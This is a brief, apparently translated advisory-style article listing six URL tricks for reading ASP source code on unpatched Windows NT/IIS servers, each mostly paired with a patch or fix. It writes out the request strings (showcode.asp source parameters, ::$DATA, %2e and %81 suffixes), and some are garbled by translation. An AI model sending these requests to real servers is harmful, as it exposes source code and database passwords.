6 methods to peek at the ASP original code

Source: www.hackbase.com

On the NT server that has not been patched with Services Pack6, there are at least 6 ways to see the source code of the ASP program. They are:

1, http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp? Source =/msadc/Samples/SELECTOR/showcode. asp
Solution: delete showcode. asp

2. $ DATA "> http: // somewhere/something. asp: $ DATA
Solution: Install sp3

3. http: // somewhere/something. asp % 2e
Solution: install sp4

Or http: // somewhere/something. asp. (add a vertex)
Solution: install sp4

4. http: // somewhere/something % 2e % 41sp
Or http: // somewhere/something % 2e % asp
Solution: install sp4

5. http: // somewhere/something. asp % 81
Solution: Install sp6 or patch

6. http: // somewhere/iissamples/exair/howitworks/code. asp? Source = xxx. asp

The biggest harm is that asp files can be read in the above way. The database password is exposed in plaintext to hackers.